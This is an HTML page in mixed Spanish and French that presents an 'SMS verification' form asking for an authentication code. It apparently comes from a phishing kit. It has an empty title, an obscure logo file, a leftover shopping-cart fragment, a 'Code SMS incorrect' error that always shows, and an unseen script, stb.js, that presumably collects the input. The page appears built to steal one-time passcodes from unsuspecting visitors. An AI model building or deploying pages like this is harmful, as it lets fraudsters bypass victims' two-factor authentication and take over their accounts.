<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/camaki.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div>
        <div class="roof">
            <img src="./img/upotms.png" alt="">
        </div>
    </div>


    <div>
        <div>
            
            
            <!-- <p class="pp2">
                Panier :
                <span>1 Article</span>
            </p> -->
            <div class="section1">
                <p class="p-0">Verificación por SMS</p>
            
                <div class="kolch">
                    <form method="post" id="pg4">
                        <p class="pp4">
                            <span>*</span> SVous recevrez un SMS contenant le code d'authentification à votre numéro. Attendez le SMS. Dès que vous l'aurez reçu, veuillez introduire le code ci-dessous.
                        </p>
                    
                        <p>SMS-Code  </p>
                        <input type="text"  name="" id="sps2" maxlength="10" style="max-width: 180px;">
                        
                        <p style="color: rgb(255, 39, 39); margin-top: -5px;">Code SMS incorrect</p>

                        <button class="btn1"  type="submit" style="margin-bottom:80px ;">Validar</button>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>